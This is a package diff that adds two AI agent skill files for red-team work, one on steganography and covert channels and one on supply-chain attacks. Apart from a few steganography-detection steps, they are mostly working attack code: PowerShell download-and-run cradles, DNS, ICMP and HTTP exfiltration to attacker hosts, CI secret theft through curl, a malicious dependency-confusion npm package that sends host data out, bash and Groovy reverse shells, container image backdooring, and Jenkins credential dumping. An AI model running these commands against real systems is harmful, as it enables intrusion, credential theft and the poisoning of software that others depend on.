rtexit-method 0.1.3 → 0.1.5

package/packaged-assets/.agents/skills/rt-steganography/SKILL.md

@@ -0,0 +1,293 @@
+---
+name: rt-steganography
+description: "Steganography detection, extraction, and covert channel exploitation skill for authorized engagements. LSB steganography detection in images/audio, StegSolve analysis, outguess and steghide extraction, DNS tunneling for C2 and data exfiltration, ICMP covert channel, HTTP header hiding, and polyglot file creation. Use when testing data exfiltration controls, covert channel detection, or analyzing suspicious files."
+---
+
+# rt-steganography — Steganography & Covert Channels
+
+## Overview
+
+Steganography hides data inside legitimate files (images, audio, video, documents). Covert channels transmit data through unexpected protocol fields. In red team engagements these are used for: stealthy C2 communication, data exfiltration bypassing DLP, and hiding payloads inside innocent-looking files.
+
+---
+
+## Phase 1 — Steganography Detection
+
+```bash
+# Install tools
+apt install steghide outguess stegosuite binwalk exiftool -y
+pip3 install stegano
+
+# Check file for embedded data
+steghide info suspicious.jpg       # Check if steghide used
+steghide extract -sf suspicious.jpg -p ""  # Try empty password
+
+# Check metadata for hidden info
+exiftool suspicious.jpg            # EXIF data — can contain hidden text
+exiftool -all= clean.jpg           # Strip all metadata (for cleanup)
+
+# binwalk — find embedded files
+binwalk suspicious.jpg
+binwalk -e suspicious.jpg          # Extract embedded content
+# Look for: PK (zip), JFIF (jpeg), PNG header embedded in another file
+
+# Check for appended data after EOF
+xxd suspicious.jpg | tail -20
+# Normal JPEG ends with: FF D9
+# Data after FF D9 = hidden content
+
+# File size anomaly detection
+# Expected JPG at resolution X×Y should be ~N bytes
+# If much larger → hidden data likely
+identify -verbose suspicious.jpg | grep "File size"
+```
+
+### 1b — LSB Analysis with StegSolve
+
+```bash
+# StegSolve — visual steganography analyzer
+# java -jar stegsolve.jar
+
+# Manual LSB check (Python)
+python3 << 'EOF'
+from PIL import Image
+
+def extract_lsb(image_path, num_bits=1):
+    img = Image.open(image_path).convert("RGB")
+    pixels = list(img.getdata())
+    bits = ""
+    for pixel in pixels:
+        for channel in pixel:
+            bits += str(channel & 1)  # LSB of each channel
+    # Convert bits to text
+    chars = [bits[i:i+8] for i in range(0, len(bits), 8)]
+    text = ""
+    for c in chars:
+        try:
+            char = chr(int(c, 2))
+            if char.isprintable():
+                text += char
+            else:
+                break
+        except: break
+    return text[:500]  # First 500 printable chars
+
+result = extract_lsb("suspicious.jpg")
+print("LSB content:", result)
+EOF
+```
+
+### 1c — Statistical Detection
+
+```bash
+# StegoVeritas — comprehensive stego analysis
+pip3 install stegoveritas
+stegoveritas suspicious.jpg -out ./analysis/
+# Tests: LSB, metadata, appended data, color histograms, etc.
+
+# zsteg — detect in PNG/BMP
+gem install zsteg
+zsteg suspicious.png        # Try all common stego methods
+zsteg -a suspicious.png     # Try all channels
+
+# Audio steganography detection
+apt install mp3stego sox -y
+mp3stego -X suspicious.mp3  # Check MP3 for hidden data
+
+# Spectrum analysis (audio)
+python3 << 'EOF'
+import numpy as np
+import scipy.io.wavfile as wav
+import matplotlib.pyplot as plt
+
+rate, data = wav.read("suspicious.wav")
+freq = np.fft.fft(data[:rate])  # First second
+plt.specgram(data, Fs=rate, cmap='inferno')
+plt.savefig("spectrum.png")
+# Visual: hidden text/images sometimes visible in spectrogram
+EOF
+```
+
+---
+
+## Phase 2 — Embed Data (Red Team Exfiltration)
+
+```bash
+# Steghide — embed file in JPEG/BMP/WAV/AU
+steghide embed -cf cover.jpg -sf secret.txt -p "passphrase" -sf output.jpg
+# -cf = cover file, -sf = secret file, -p = password
+
+# Hide PowerShell payload in image
+echo "IEX(New-Object Net.WebClient).DownloadString('http://C2/shell.ps1')" > payload.txt
+steghide embed -cf photo.jpg -sf payload.txt -p "" -f  # No password, force
+
+# Extract on target
+steghide extract -sf photo.jpg -p ""
+
+# Outguess (harder to detect)
+outguess -k "secretkey" -d hidden.txt cover.jpg output.jpg
+outguess -k "secretkey" -r output.jpg recovered.txt
+
+# Hide in document metadata
+exiftool -Comment="BASE64_PAYLOAD" document.pdf
+exiftool -Artist="$(cat payload.txt | base64)" photo.jpg
+
+# Polyglot file (valid as two different formats)
+# JPEG + ZIP polyglot — opens as image AND contains ZIP
+cat cover.jpg payload.zip > polyglot.jpg
+# unzip polyglot.jpg → extracts ZIP contents
+# browser/image viewer → shows image
+```
+
+---
+
+## Phase 3 — DNS Tunneling (C2 / Exfiltration)
+
+```bash
+# DNS tunneling encodes data in DNS queries/responses
+# Bypasses most firewalls (DNS port 53 almost always allowed)
+
+# iodine — full IP tunnel over DNS
+# Server (needs a domain with NS record pointing to your server)
+iodined -f -c -P password 10.0.0.1 tunnel.attacker.com
+# Client (on compromised host)
+iodine -f -P password tunnel.attacker.com
+# Creates tun0 with 10.0.0.2 → full IP connectivity over DNS
+
+# dnscat2 — DNS C2 (simpler, no root needed)
+# Server
+ruby dnscat2.rb --dns "domain=tunnel.attacker.com,host=0.0.0.0" --secret=password
+
+# Client (on target)
+./dnscat --dns domain=tunnel.attacker.com --secret=password
+# Or PowerShell client:
+IEX (New-Object Net.WebClient).DownloadString('http://C2/Invoke-DNScat.ps1')
+Invoke-DNScat -Domain tunnel.attacker.com -Secret password
+
+# Manual DNS exfiltration (no tool needed — extreme environments)
+# Split secret into 63-char DNS label chunks
+python3 << 'EOF'
+import base64, subprocess
+
+secret = open("sensitive_data.txt", "rb").read()
+encoded = base64.b32encode(secret).decode().lower().rstrip("=")
+chunks = [encoded[i:i+60] for i in range(0, len(encoded), 60)]
+for i, chunk in enumerate(chunks):
+    # Each chunk = DNS query → logged by attacker's DNS server
+    subprocess.run(["nslookup", f"{i}.{chunk}.exfil.attacker.com"], capture_output=True)
+EOF
+```
+
+---
+
+## Phase 4 — ICMP Covert Channel
+
+```bash
+# ptunnel-ng — TCP over ICMP (bypasses TCP-blocking firewalls)
+# Server (attacker)
+ptunnel-ng -p ATTACKER_IP
+
+# Client (compromised host — only ICMP allowed out)
+ptunnel-ng -p ATTACKER_IP -lp 8022 -da INTERNAL_SSH_HOST -dp 22
+# Routes TCP port 8022 → ICMP → INTERNAL_SSH_HOST:22
+ssh -p 8022 user@localhost
+
+# Manual ICMP data hiding
+python3 << 'EOF'
+from scapy.all import *
+
+# Hide data in ICMP echo request payload
+secret = b"stolen_credential_hash_here"
+packet = IP(dst="8.8.8.8") / ICMP(type=8, code=0) / Raw(load=secret)
+send(packet)
+
+# Receive: monitor ICMP on attacker side
+sniff(filter="icmp and icmp[icmptype]=8", 
+      prn=lambda p: print("RECV:", bytes(p[Raw])))
+EOF
+```
+
+---
+
+## Phase 5 — HTTP/HTTPS Covert Channels
+
+```bash
+# Hide data in HTTP headers (not logged by most proxies)
+curl https://target.com/ \
+  -H "X-Custom-Data: $(echo 'stolen data' | base64)" \
+  -H "X-Request-ID: $(cat /etc/passwd | head -1 | base64)"
+
+# HTTP timing channel (encode bits via request timing)
+python3 << 'EOF'
+import requests, time
+
+def send_bit(bit, url):
+    if bit == '1':
+        time.sleep(0.5)  # Delay = 1 bit
+    requests.get(url)    # Request = 0 bit
+
+secret = "SECRET"
+bits = ''.join(format(ord(c), '08b') for c in secret)
+for bit in bits:
+    send_bit(bit, "https://attacker.com/beacon")
+EOF
+
+# Exfil in User-Agent or other headers
+# (many DLP tools don't inspect all headers)
+curl "https://www.google.com" \
+  -H "User-Agent: Mozilla/5.0 $(cat sensitive.txt | base64 | tr -d '\n' | head -c 100)"
+```
+
+---
+
+## Phase 6 — DLP Bypass Techniques
+
+```bash
+# Bypass Data Loss Prevention controls
+
+# Encode data to avoid keyword detection
+cat sensitive.txt | base64 | curl -X POST https://attacker.com/ -d @-
+cat sensitive.txt | gzip | base64 | curl -X POST https://attacker.com/ -d @-
+
+# Embed in image (DLP can't scan steganography)
+steghide embed -cf innocent.jpg -sf sensitive.txt -p "key" && \
+  curl -X POST https://fileupload.attacker.com/ -F "file=@innocent.jpg"
+
+# Exfil via cloud storage (often whitelisted by DLP)
+aws s3 cp sensitive.txt s3://attacker-bucket/ --acl public-read
+# Or: Google Drive, Dropbox, OneDrive via API
+
+# Exfil over allowed SaaS APIs
+# Slack: post to attacker-controlled workspace
+curl -X POST https://slack.com/api/files.upload \
+  -H "Authorization: Bearer ATTACKER_TOKEN" \
+  -F file=@sensitive.txt -F channels=C0123456
+
+# GitHub Gist
+curl -X POST https://api.github.com/gists \
+  -H "Authorization: token ATTACKER_TOKEN" \
+  -d "{\"public\":false,\"files\":{\"data.txt\":{\"content\":\"$(base64 sensitive.txt)\"}}}"
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** steghide/binwalk for detection · Basic LSB extraction · DNS exfiltration via nslookup
+
+**INTERMEDIATE:** iodine/dnscat2 C2 tunnel · ICMP covert channel · Embed payloads in images · DLP bypass via encoding
+
+**ADVANCED:** ptunnel-ng TCP-over-ICMP · Custom ICMP/HTTP covert channels · Statistical stego detection
+
+**EXPERT:** Custom DNS C2 protocol · Timing covert channels · Steganography in video streams · Anti-forensic exfiltration
+
+---
+
+## References
+
+- iodine: https://github.com/yarrick/iodine
+- dnscat2: https://github.com/iagox86/dnscat2
+- ptunnel-ng: https://github.com/utoni/ptunnel-ng
+- steghide: https://steghide.sourceforge.net
+- zsteg: https://github.com/zed-0xff/zsteg
+- MITRE T1048: https://attack.mitre.org/techniques/T1048/

package/packaged-assets/.agents/skills/rt-supply-chain/SKILL.md

@@ -0,0 +1,322 @@
+---
+name: rt-supply-chain
+description: "Supply chain attack simulation for authorized red team engagements. GitHub Actions workflow compromise, CI/CD pipeline secret extraction, npm/PyPI/RubyGems package dependency confusion, container registry poisoning, dependency hijacking, and build system compromise. Use when engagement scope includes development infrastructure, CI/CD pipelines, or software supply chain testing."
+---
+
+# rt-supply-chain — Supply Chain Attack Simulation
+
+## Overview
+
+Supply chain attacks target the development and delivery pipeline rather than production systems directly. A single compromised dependency, CI/CD pipeline, or build system can grant persistent access to every downstream consumer. Supply chain was the attack vector in SolarWinds, XZ Utils, and numerous npm/PyPI incidents.
+
+**Attack surfaces:**
+- CI/CD pipelines (GitHub Actions, GitLab CI, Jenkins, CircleCI)
+- Package managers (npm, PyPI, RubyGems, Maven, NuGet)
+- Container registries (Docker Hub, ECR, GCR)
+- Build systems and artifact repositories
+- Third-party integrations and OAuth apps
+
+---
+
+## Phase 1 — Reconnaissance: Map the Supply Chain
+
+```bash
+# Find what CI/CD system is used
+# GitHub: look for .github/workflows/*.yml
+# GitLab: .gitlab-ci.yml
+# Jenkins: Jenkinsfile
+# CircleCI: .circleci/config.yml
+
+# Enumerate org's GitHub Actions workflows
+gh api /repos/ORG/REPO/actions/workflows | jq '.workflows[].name'
+
+# Find exposed secrets in public repos
+trufflehog github --org=TARGET_ORG --only-verified
+gitleaks detect --source . --verbose
+
+# Find dependency files
+find . -name "package.json" -o -name "requirements.txt" \
+       -o -name "Gemfile" -o -name "pom.xml" -o -name "go.mod"
+
+# Check npm packages used
+cat package.json | jq '.dependencies, .devDependencies'
+
+# Check for internal package names (dependency confusion targets)
+# Internal names often: @company/internal-lib, company-utils, etc.
+cat package.json | grep -i "internal\|private\|corp\|company"
+```
+
+---
+
+## Phase 2 — GitHub Actions Pipeline Compromise
+
+### 2a — GITHUB_TOKEN Abuse (Excessive Permissions)
+
+```bash
+# GITHUB_TOKEN is auto-provided to every workflow
+# If permissions are write-all → can push to repo, create releases, etc.
+
+# Check workflow permissions
+cat .github/workflows/deploy.yml | grep -A5 "permissions:"
+# Dangerous: permissions: write-all OR contents: write + packages: write
+
+# In a compromised workflow run context:
+# Exfiltrate GITHUB_TOKEN
+- name: exfil
+  run: |
+    curl -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \
+      https://api.github.com/user
+
+# Use GITHUB_TOKEN to push to protected branch
+git config user.email "action@github.com"
+git config user.name "GitHub Actions"
+git remote set-url origin https://x-access-token:${{ secrets.GITHUB_TOKEN }}@github.com/ORG/REPO
+git push origin main --force
+```
+
+### 2b — Secret Extraction from Workflow
+
+```bash
+# Secrets are masked in logs but can be extracted via encoding tricks
+# (In authorized tests only — demonstrates the risk)
+
+# Exfil via base64 (bypasses log masking for short secrets)
+- name: exfil-secrets
+  run: |
+    echo "${{ secrets.AWS_SECRET_ACCESS_KEY }}" | base64 | \
+      curl -X POST https://attacker.com/collect -d @-
+
+# Exfil via environment variable split
+- name: exfil-split
+  run: |
+    secret="${{ secrets.DATABASE_PASSWORD }}"
+    echo "${secret:0:4}"
+    echo "${secret:4:4}"
+    # Piece together from logs
+```
+
+### 2c — Workflow Injection (Pull Request from Fork)
+
+```yaml
+# Vulnerable workflow: uses pull_request_target + checks out PR code
+# Attacker creates fork, modifies workflow, opens PR
+
+# Vulnerable (target's workflow):
+on:
+  pull_request_target:
+    types: [opened]
+jobs:
+  test:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v3
+        with:
+          ref: ${{ github.event.pull_request.head.sha }}  # ← checks out attacker code
+      - run: npm test  # ← runs attacker's package.json scripts
+
+# Attacker's fork — modify package.json:
+{
+  "scripts": {
+    "test": "curl https://attacker.com/exfil?token=$GITHUB_TOKEN"
+  }
+}
+```
+
+### 2d — Compromised GitHub Action (Third-Party Action Abuse)
+
+```bash
+# Many workflows use third-party actions pinned to branch (not commit hash)
+# If action is compromised (maintainer account takeover), all users affected
+
+# Check for unpinned actions
+grep -r "uses:" .github/workflows/ | grep -v "@[a-f0-9]\{40\}"
+# Dangerous: actions/checkout@v3 (branch tag, not commit SHA)
+# Safe: actions/checkout@2d7d9f7789898b426…  (full SHA)
+
+# Demonstrate risk: if you control the action repo
+# Modify action.yml entrypoint to exfiltrate secrets before running real action
+```
+
+---
+
+## Phase 3 — Dependency Confusion Attack
+
+```bash
+# Target uses private package @corp/internal-utils (not published to public npm)
+# If NOT published publicly → attacker can publish a malicious version
+
+# Step 1: Find internal package names
+# Search GitHub for "require('@corp/", "from '@corp/"
+gh search code "require('@corp/" --language=JavaScript
+# Or: check exposed package.json in public repos
+
+# Step 2: Check if name is taken on public registry
+npm view @corp/internal-utils  # If "404 Not Found" → vulnerable
+
+# Step 3: Register the name with a higher version
+# Create malicious package:
+mkdir corp-internal-utils && cd corp-internal-utils
+cat > package.json << 'EOF'
+{
+  "name": "@corp/internal-utils",
+  "version": "9.9.9",
+  "description": "dependency confusion PoC",
+  "main": "index.js"
+}
+EOF
+
+cat > index.js << 'EOF'
+const os = require('os');
+const https = require('https');
+const data = JSON.stringify({
+  hostname: os.hostname(),
+  user: os.userInfo().username,
+  platform: os.platform(),
+  env: Object.keys(process.env)
+});
+const req = https.request({hostname: 'attacker.com', path: '/dc', method: 'POST',
+  headers: {'Content-Type': 'application/json'}});
+req.write(data); req.end();
+EOF
+
+# Publish
+npm publish --access public
+# npm install will now pull version 9.9.9 (higher than any internal version)
+```
+
+---
+
+## Phase 4 — Container Registry Attacks
+
+### 4a — Public Registry Typosquatting
+
+```bash
+# Find what base images target uses
+grep -r "FROM " Dockerfile* docker-compose* .github/workflows/
+
+# Common typosquats:
+# ubuntu:20.04 → ubnutu:20.04 (typo)
+# nginx:latest → ngnix:latest
+# python:3.11 → pytohn:3.11
+
+# Register typosquatted image on Docker Hub
+# Add malicious layer that exfils secrets at container start
+```
+
+### 4b — ECR / GCR / ACR Misconfiguration
+
+```bash
+# AWS ECR — check for public access
+aws ecr describe-repositories --region us-east-1
+aws ecr get-repository-policy --repository-name TARGET_REPO --region us-east-1
+
+# If public: pull and inspect layers for hardcoded secrets
+docker pull 123456789.dkr.ecr.us-east-1.amazonaws.com/target-app:latest
+docker history 123456789.dkr.ecr.us-east-1.amazonaws.com/target-app:latest
+docker save target-app:latest | tar x
+# Inspect each layer tar for secrets
+
+# Dive tool — better layer inspection
+dive 123456789.dkr.ecr.us-east-1.amazonaws.com/target-app:latest
+```
+
+### 4c — Image Poisoning (After Registry Access)
+
+```bash
+# If registry write access obtained (via stolen CI/CD creds or IAM misconfiguration)
+# Build malicious image based on legitimate one
+
+FROM legitimate-app:1.2.3
+# Add backdoor layer
+RUN echo '#!/bin/bash\nbash -i >& /dev/tcp/ATTACKER/4444 0>&1' > /usr/local/bin/healthcheck && \
+    chmod +x /usr/local/bin/healthcheck
+CMD ["/usr/local/bin/start-with-backdoor.sh"]
+
+# Push with same tag — replaces production image
+docker tag malicious-app:latest REGISTRY/legitimate-app:1.2.3
+docker push REGISTRY/legitimate-app:1.2.3
+```
+
+---
+
+## Phase 5 — Jenkins & Build System Attacks
+
+```bash
+# Find Jenkins
+nmap -sV -p 8080,8443,50000 TARGET_RANGE
+# Check for open dashboard (no auth)
+curl http://TARGET:8080/view/all/newJob
+
+# Groovy script execution (if admin access)
+# Jenkins → Manage Jenkins → Script Console
+Thread.start {
+  def cmd = "id"
+  def proc = cmd.execute()
+  proc.waitFor()
+  println proc.text
+}
+
+# Groovy reverse shell
+Thread.start {
+  String host="ATTACKER_IP"
+  int port=4444
+  String cmd="bash"
+  Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start()
+  Socket s=new Socket(host,port)
+  InputStream pi=p.getInputStream(), si=s.getInputStream()
+  OutputStream po=p.getOutputStream(), so=s.getOutputStream()
+  while(!s.isClosed()) {
+    while(pi.available()>0) so.write(pi.read())
+    while(si.available()>0) po.write(si.read())
+    so.flush(); po.flush()
+    Thread.sleep(50)
+  }
+}
+
+# Extract credentials from Jenkins credential store
+# Script Console:
+import jenkins.model.Jenkins
+import com.cloudbees.plugins.credentials.*
+import com.cloudbees.plugins.credentials.impl.*
+
+def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
+  com.cloudbees.plugins.credentials.common.StandardUsernameCredentials.class,
+  Jenkins.instance, null, null)
+for (c in creds) {
+  println c.id + " : " + c.username + " : " + c.password
+}
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:**
+- Dependency confusion: check if internal package names are registered publicly
+- GitHub Actions: find secrets in workflow logs
+- Docker layer inspection for hardcoded credentials
+
+**INTERMEDIATE:**
+- Dependency confusion: publish proof-of-concept package
+- GitHub Actions workflow injection via pull_request_target
+- Jenkins credential extraction via Groovy console
+
+**ADVANCED:**
+- GITHUB_TOKEN abuse to push to protected branches
+- Container registry image poisoning
+- CI/CD pipeline secret extraction via log manipulation
+
+**EXPERT:**
+- Third-party GitHub Action compromise simulation
+- Multi-hop supply chain: package → CI/CD → production deployment
+- Build system backdoor persistence
+
+---
+
+## References
+
+- Research paper: https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610
+- GitHub Actions security: https://securitylab.github.com/research/github-actions-preventing-pwn-requests/
+- SLSA framework: https://slsa.dev
+- MITRE ATT&CK T1195: https://attack.mitre.org/techniques/T1195/
+- Snyk supply chain guide: https://snyk.io/blog/software-supply-chain-security/